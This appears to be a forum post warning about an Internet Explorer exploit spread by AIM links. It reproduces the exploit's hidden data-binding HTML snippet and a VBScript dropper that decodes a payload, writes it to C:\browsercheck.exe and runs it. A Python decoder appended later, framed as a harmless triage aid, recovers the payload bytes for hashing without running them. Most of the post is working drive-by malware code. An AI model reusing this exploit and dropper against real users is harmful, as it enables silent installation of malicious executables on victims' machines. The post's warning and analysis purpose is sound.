This is the newest IE exploit going around. There's a version of it going around on AIM where you will get an IM from a buddy that has the virus telling you to visit a website.
Simple FIX: DON'T RUN IE. It sucks and it's full of unpatched holes that can lead to problems like this. Some are more than 2 years old. Use Mozilla.
Here's the exploit
that passes you to a drunkchicks.php which opens up the exploit
Code:
<div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2">
  <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
  <xml id="oExec">
    <security>
      <exploit>
        <![CDATA[ <object id="oFile" data="drunkchicks.php"></object> ]]>
      </exploit>
    </security>
  </xml>
</div>
Here is a section of it
The payload is encoded. I don't know VB all that well but it looks like simple ASCII encoding. If I get bored I'll see if I can decode it.
Code:
function res(x,y)
    For k = 0 To UBound(v)
        v(k) = Replace(v(k), x, y)
    Next
End Function
res "z", "ff"
res "y", "00"
For m = 0 To UBound(v)
    it = it & v(m)
Next
tmp = Split(it, ",")
Set WshShell = CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("Process")
pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
pth = "C:\browsercheck.exe"
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(pth, True)
For i = 0 To UBound(tmp)
    l = Len(tmp(i))
    b = Int("&H" & Left(tmp(i), 2))
    If l > 2 Then
        r = Int("&H" & Mid(tmp(i), 3, l-2))
        For j = 1 To r
            f.Write Chr(b)
        Next
    Else
        f.Write Chr(b)
    End If
Next
f.Close
WshShell.run("""" & pth & """")



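The script section quoted above turns its strings into a file by expanding "z" to "ff" and "y" to "00", splitting on commas, and reading each token as a two-digit hex byte followed by an optional hex repeat count. As an added example (not part of the original post or of the exploit), this Python decoder recovers the bytes for hashing and triage without writing or running them; the names `decode_payload`, `summarize` and `SAMPLE_CHUNKS` are hypothetical, and the sample input is constructed because the encoded strings (`v`) are not shown in the post.

```python
import hashlib
import re

TOKEN_RE = re.compile(r"[0-9a-fA-F]{2,}")
MAX_OUTPUT = 16 * 1024 * 1024  # refuse absurd run counts instead of exhausting memory


def decode_payload(chunks, max_output=MAX_OUTPUT):
    """Decode the dropper's payload strings to bytes without writing or running anything."""
    # Same substitutions as the script's res "z", "ff" and res "y", "00" calls.
    text = "".join(chunks).replace("z", "ff").replace("y", "00")
    out = bytearray()
    for pos, token in enumerate(text.split(",")):
        if not TOKEN_RE.fullmatch(token):
            raise ValueError(f"malformed token {token!r} at index {pos}")
        byte = int(token[:2], 16)  # first two hex digits: the byte value
        # Any remaining hex digits are a repeat count (assumed plain unsigned hex).
        count = int(token[2:], 16) if len(token) > 2 else 1
        if len(out) + count > max_output:
            raise ValueError(f"token {pos} would exceed {max_output} bytes")
        out.extend(bytes([byte]) * count)
    return bytes(out)


def summarize(data):
    """Facts an analyst records about the decoded blob."""
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "looks_like_pe": data[:2] == b"MZ",
    }


# Constructed sample (not the real payload): "AAAA", three NUL bytes, 0xff, "hi",
# split across two strings the way the script's v array would hold it.
SAMPLE_CHUNKS = ["4104,y3,", "z,68,69"]

if __name__ == "__main__":
    blob = decode_payload(SAMPLE_CHUNKS)
    print(blob, summarize(blob))
```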
If only the tabbrowser plugin worked 100%, I'd have fully switched; as it is, I still run both.
